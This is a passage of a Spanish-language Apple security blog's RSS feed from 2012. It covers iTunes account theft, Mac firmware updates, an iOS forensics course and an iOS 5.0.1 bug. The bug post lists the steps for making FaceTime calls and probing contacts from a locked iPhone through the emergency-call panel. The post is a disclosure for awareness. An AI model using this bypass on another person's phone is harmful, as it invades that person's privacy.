href="http://www.seguridadapple.com/"&gt;Seguridad Apple&lt;/a&gt; un artículo titulado "&lt;a href="http://www.seguridadapple.com/2011/03/el-negocio-de-las-mafias-que-roban.html"&gt;El negocio de las mafias que hacen dinero por iTunes&lt;/a&gt;" en el que recogíamos los trucos que usan las mafias del cibercrimen para ganar dinero robando cuentas de iTunes de distintas maneras. Robar cuentas de usuario y gastar los bonos regalos en comprar aplicaciones fraudulentas de la mafia, crear aplicaciones inútiles con el único objetivo de blanquear dinero y cuyos compradores son personas ficticias que usan dinero del cibercrimen o desarrollar malware especial para capturar las cuentas de los usuarios de iTunes es su día a día.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Apple lleva sufriendo este problema desde hace bastante tiempo, y un informe publicado en &lt;i&gt;&lt;b&gt;The Global Mail &lt;/b&gt;&lt;/i&gt;titulado "&lt;a href="http://www.theglobalmail.org/feature/hacking-worm-holes-in-itunes/31/"&gt;Hacking Worm Holes in iTunes&lt;/a&gt;" ha puesto de manifiesto que esto sigue siendo así. Usuarios desde el año 2010 reportan como han sufrido robos de dinero, manipulación de compras y de datos en sus perfiles de usuario por atacantes.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://2.bp.blogspot.com/-T3Skx31-oXU/TzS4a9CaXLI/AAAAAAAAC_k/1IBdoUWJ9FM/s1600/Cita_2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="72" src="http://2.bp.blogspot.com/-T3Skx31-oXU/TzS4a9CaXLI/AAAAAAAAC_k/1IBdoUWJ9FM/s200/Cita_2.png" width="200" /&gt;&lt;/a&gt;Los testimonios de muchos de ellos pueden verse por todo Internet, pero en el propio foro de &lt;i&gt;&lt;b&gt;Discussions&lt;/b&gt;&lt;/i&gt; de Apple es posible leer, en el hilo "&lt;a href="https://discussions.apple.com/thread/2665383?start=1065&amp;amp;tstart=0"&gt;iTunes Store Account Hacked&lt;/a&gt;" las experiencias de muchos de ellos en una compilación que alcanza ahora mismo las 73 páginas.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://2.bp.blogspot.com/-ts8HaUEXy8Q/TzS4abInrCI/AAAAAAAAC_g/XTlYTHn6RZo/s1600/Cita_1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="103" src="http://2.bp.blogspot.com/-ts8HaUEXy8Q/TzS4abInrCI/AAAAAAAAC_g/XTlYTHn6RZo/s200/Cita_1.png" width="200" /&gt;&lt;/a&gt;En los comentarios de las víctimas se pueden leer las citas que &lt;i&gt;&lt;b&gt;The Global Mail&lt;/b&gt;&lt;/i&gt; ha extraído en su artículo en las que explican qué les pasó exactamente y cómo Apple se hizo cargo de todo porque son conscientes de este problema. Si embargo, muchos usuarios se quejan de que no han recibido ninguna explicación clara de qué ha pasado con su cuenta de manera oficial.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El cibercrimen está muy organizado y avanzado desde hace mucho tiempo por lo que te recomendamos que tengas especial cuidado con tus credenciales de iTunes, no usándolas nada más que en tu equipo personal y teniendo especial cuidado en la seguridad del mismo.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-3953199522577716217?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=8yDuNuoIYuc:hpuOudFuusw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=8yDuNuoIYuc:hpuOudFuusw:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=8yDuNuoIYuc:hpuOudFuusw:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=8yDuNuoIYuc:hpuOudFuusw:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=8yDuNuoIYuc:hpuOudFuusw:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=8yDuNuoIYuc:hpuOudFuusw:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=8yDuNuoIYuc:hpuOudFuusw:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=8yDuNuoIYuc:hpuOudFuusw:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/8yDuNuoIYuc/las-mafias-siguen-haciendo-su-negocio.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-7_rMcoI-JT4/TzS4brxibSI/AAAAAAAAC_s/8Lts9yk5EtM/s72-c/iTunesHacked.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/las-mafias-siguen-haciendo-su-negocio.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-8105879088384129608</guid><pubDate>Thu, 09 Feb 2012 15:00:00 +0000</pubDate><atom:updated>2012-02-09T16:00:50.399+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">iPhone 4S</category><category domain="http://www.blogger.com/atom/ns#">iPhone</category><category domain="http://www.blogger.com/atom/ns#">iOS</category><category domain="http://www.blogger.com/atom/ns#">Bugs</category><title>Un Bug en iOS 5.0.1 permite hacer llamadas FaceTime desde panel de emergencia en iPhones 4 y 4S bloqueados</title><description>&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-yBZ9jcelM48/TzPeOHGXuGI/AAAAAAAAC_I/PlCGN3ZnL5w/s1600/iphone-facetime-lisa.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-yBZ9jcelM48/TzPeOHGXuGI/AAAAAAAAC_I/PlCGN3ZnL5w/s320/iphone-facetime-lisa.png" width="213" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Llamando por FaceTime&lt;br /&gt;
en un iPhone bloqueado&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;Un nuevo fallo parecido a otros del pasado ha sido descubierto en la última versión de &lt;a href="http://www.seguridadapple.com/2011/11/ios-501-es-una-actualizacion-de.html"&gt;iOS 5.0.1&lt;/a&gt; que permite a cualquiera hacer una llamada por &lt;i&gt;&lt;b&gt;FaceTime&lt;/b&gt;&lt;/i&gt; usando el panel de llamada de emergencia en un teléfono iPhone 4 o iPhone 4S aunque éste tenga bloqueado el acceso por código y desactivado el control de voz.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El proceso para probarlo es bastante sencillo, ya que basta con que sigas estos pasos:&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;i&gt;1.- Bloquea tu iPhone con un código de acceso.&lt;br /&gt;
2.- En el panel de introducción de código selecciona llamada de emergencia.&lt;br /&gt;
3.- En el panel de llamada de emergencia activa el control de voz dejando pulsado el botón de opción tres segundos.&lt;br /&gt;
4.- Una vez allí, si quieres descubrir nombres en la agenda de contactos di el nombre de la persona. No permitirá llamar, pero sí conocer si un determinado nombre está en la agenda de contacto.&lt;br /&gt;
5.- Genera una llamada de &lt;b&gt;FaceTime&lt;/b&gt; diciendo FaceTime y el nombre del contacto.&lt;/i&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;El bug fue &lt;a href="http://www.blogger.com/goog_630229969"&gt;descubierto por un escritor tecnológico canadiense llamado&amp;nbsp;&lt;/a&gt;&lt;span style="background-color: white;"&gt;&lt;a href="http://peekay.org/2012/02/05/more-fun-with-locked-iphone-4/"&gt;Ade Barkah&lt;/a&gt; y ya ha dado la vuelta al mundo, así que Apple tendrá que anotarse este bug para solucionar en la próxima actualización del terminal.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-8105879088384129608?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gO7KX7HXIrE:6C6VAn7bWCw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gO7KX7HXIrE:6C6VAn7bWCw:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gO7KX7HXIrE:6C6VAn7bWCw:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gO7KX7HXIrE:6C6VAn7bWCw:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gO7KX7HXIrE:6C6VAn7bWCw:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=gO7KX7HXIrE:6C6VAn7bWCw:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gO7KX7HXIrE:6C6VAn7bWCw:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=gO7KX7HXIrE:6C6VAn7bWCw:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/gO7KX7HXIrE/un-bug-en-ios-501-permite-hacer.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-yBZ9jcelM48/TzPeOHGXuGI/AAAAAAAAC_I/PlCGN3ZnL5w/s72-c/iphone-facetime-lisa.png" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/un-bug-en-ios-501-permite-hacer.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-2451288058965408311</guid><pubDate>Thu, 09 Feb 2012 07:33:00 +0000</pubDate><atom:updated>2012-02-09T08:33:47.400+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">MacBook Air</category><category domain="http://www.blogger.com/atom/ns#">firmware</category><category domain="http://www.blogger.com/atom/ns#">MacBook Pro</category><category domain="http://www.blogger.com/atom/ns#">backup</category><category domain="http://www.blogger.com/atom/ns#">imac</category><category domain="http://www.blogger.com/atom/ns#">Lion</category><category domain="http://www.blogger.com/atom/ns#">Actualizaciones</category><title>Apple añade soporte de Lion Internet Recovery a más Macs</title><description>&lt;div style="text-align: justify;"&gt;A finales de Enero Apple &lt;a href="http://www.seguridadapple.com/2012/01/actualizaciones-de-firmware-para.html"&gt;actualizó el firmware de parte de la gama soportada de equipos Mac para dar soporte a Lion Internet Recovery&lt;/a&gt;, y ahora continua con el proceso de dotar a todos los equipos aún mantenidos por la compañía de esta misma característica.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-YAvCtATpDzs/TzN2TzTQVDI/AAAAAAAAC_A/2WiNolgPrtQ/s1600/MacFirmware.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-YAvCtATpDzs/TzN2TzTQVDI/AAAAAAAAC_A/2WiNolgPrtQ/s640/MacFirmware.png" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Equipos actulizados&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Los equipos actualizados son:&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;i&gt;- MacBook Pro de principios de 2010: &lt;a href="http://support.apple.com/kb/DL1492"&gt;MacBook Pro EFI Firmware 2.6&lt;br /&gt;
&lt;/a&gt;- iMac de mediados de 2010: &lt;a href="http://support.apple.com/kb/DL1493"&gt;iMac EFI Update 1.8&lt;/a&gt;&lt;br /&gt;
- MacBook Air de finales de 2010: &lt;a href="http://support.apple.com/kb/DL1494"&gt;MacBook Air EFI Firmware Update 2.3&lt;/a&gt;&lt;/i&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;En el caso de los MacBook Air, además se soluciona un fallo que se produce cuando se pulsa el botón de encendido nada más despertar de una suspensión. En todos los casos se añade la funcionalidad de &lt;i&gt;&lt;b&gt;Lion Internet Recovery&lt;/b&gt;&lt;/i&gt;, que permite arrancar la recuperación del sistema desde los servidores Apple.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-2451288058965408311?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=OscOxCmnJA4:k5hmqJe4Nww:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=OscOxCmnJA4:k5hmqJe4Nww:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=OscOxCmnJA4:k5hmqJe4Nww:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=OscOxCmnJA4:k5hmqJe4Nww:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=OscOxCmnJA4:k5hmqJe4Nww:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=OscOxCmnJA4:k5hmqJe4Nww:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=OscOxCmnJA4:k5hmqJe4Nww:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=OscOxCmnJA4:k5hmqJe4Nww:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/OscOxCmnJA4/apple-anade-soporte-de-lion-internet.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-YAvCtATpDzs/TzN2TzTQVDI/AAAAAAAAC_A/2WiNolgPrtQ/s72-c/MacFirmware.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/apple-anade-soporte-de-lion-internet.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-4824119446279449020</guid><pubDate>Wed, 08 Feb 2012 07:04:00 +0000</pubDate><atom:updated>2012-02-08T08:04:47.114+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">cursos</category><category domain="http://www.blogger.com/atom/ns#">iPhone</category><category domain="http://www.blogger.com/atom/ns#">iPad</category><category domain="http://www.blogger.com/atom/ns#">iOS</category><category domain="http://www.blogger.com/atom/ns#">Análisis forense</category><title>Quedan 4 plazas en el RootedLab de Análisis Forense iOS</title><description>&lt;div style="text-align: justify;"&gt;&lt;a href="http://1.bp.blogspot.com/-p4dY7whg6i4/TvRmUTsmp6I/AAAAAAAACwE/9EsLXQUqsmk/s1600/iPad_forense.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-p4dY7whg6i4/TvRmUTsmp6I/AAAAAAAACwE/9EsLXQUqsmk/s200/iPad_forense.png" width="120" /&gt;&lt;/a&gt;Como ya os habíamos anticipado,&amp;nbsp;&lt;b style="font-style: italic;"&gt;Juan Garrido "Silverhack"&lt;/b&gt;, analista forense, especialista en seguridad informática y hacking, autor del libro "&lt;a href="http://www.informatica64.com/libros.aspx?id=forense"&gt;Análisis Forense Digital en entornos Windows&lt;/a&gt;", y responsable de los servicios de &lt;a href="http://www.informatica64.com/AnalisisForense/"&gt;Análisis forense de dispositivos móviles&lt;/a&gt; y &lt;a href="http://www.informatica64.com/borradosegurodatos/"&gt;Borrado seguro de datos en dispositivos móviles&lt;/a&gt;, en la próxima &lt;a href="http://www.rootedcon.es/"&gt;RootedCON&lt;/a&gt; 2012, un &lt;a href="http://labs.rootedcon.es/labs-y-trainers/juan-garrido-analisis-forense-de-idevices"&gt;RootedLab de 8 horas centrado en el análisis forense de dispositivos móviles de Apple, los iDevices&lt;/a&gt;&amp;nbsp;a un grupo máximo de 12 alumnos en Madrid, donde se podrá ver cuál es el proceso y las herramientas que se pueden utilizar para conocer lo que ha sucedido en la vida de un iDevice a lo largo de su uso.&lt;br /&gt;
&lt;br /&gt;
El curso se realizará en &lt;u&gt;Madrid, el día 28 de Febrero de 2012&lt;/u&gt; y de las 12 plazas ya &lt;u&gt;sólo quedan disponibles 4 plazas&lt;/u&gt;&amp;nbsp;para apuntarse, por lo que si estás pensando en aprender a realizar un análisis forense a dispositivos Apple, éste es el momento para que reserves la tuya. Tienes toda la información de horarios y registros en la web de los&amp;nbsp;&lt;a href="http://labs.rootedcon.es/"&gt;RootedLabs&lt;/a&gt;. En el precio de 200 € del seminario se incluye el desayuno y la comida conjunta con ponentes y asitentes.&amp;nbsp;Los contenidos del curso son:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;b&gt;Descripción&lt;/b&gt;: Cada vez los dispositivos móviles de Apple son más importantes en nuestro día a día, llamadas, agendas, notas y fotografías, pueden ser utilizados para cometer un delito o fraude. Este Training proporciona los conocimientos y las habilidades necesarias para llevar a cabo una investigación sobre terminales Apple mediante diversas herramientas. Los alumnos adquirirán experiencia práctica con las imágenes del teléfono y el análisis de tarjetas SIM y tarjetas de memoria.&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;b&gt;Audiencia&lt;/b&gt;: Analistas forenses, técnicos de seguridad y cualquier persona con interés en la seguridad informática.&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;b&gt;Objetivos&lt;/b&gt;: El objetivo de este curso es dotar a los alumnos de los conocimientos, procedimientos y herramientas para los dispositivos móviles más utilizados hoy de Apple: iPhone, iPad y iPod Touch.&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://4.bp.blogspot.com/-CPzLM4aSrGA/TdOLNBDft2I/AAAAAAAABX8/R0plAZj7eHc/s1600/forenseiphone.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-CPzLM4aSrGA/TdOLNBDft2I/AAAAAAAABX8/R0plAZj7eHc/s320/forenseiphone.jpg" width="165" /&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;Contenidos:&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;1. Telefonía Móvil&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1.1. Introducción a la telefonía móvil&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1.2. Consideraciones legales en España&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1.3. Como iniciar un proceso forense&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;2. Tarjetas SIM&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2.1. Creación de un entorno de laboratorio&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2.2. Tarjetas SIM&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2.3. Análisis de tarjetas SIM&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2.4. Clonadoras de SIM y dispositivos&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;3. Análisis de Herramientas&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3.1. Forense de Dispositivos móviles&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3.2. Utilización de Bitpim&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3.3. Utilidades Device Seizure&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3.4. Oxygen Forensics&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;4. Análisis de dispositivos Apple&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4.1. Versiones de iOS&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4.1.1  Principales vulnerabilidades y cambios en versiones&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4.2. Estructura de ficheros y protección del sistema&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4.3. Backups de iOS vía iTunes&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4.4. Archivos de datos&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4.5. Apple Safari en iOS&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4.6. Aplicativos más comunes en sistemas iOS&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;5. Oxygen Forensics for iOS&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 5.1 Versiones&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 5.2 Realización de un análisis completo de un iPhone&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 5.3. Reporting&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
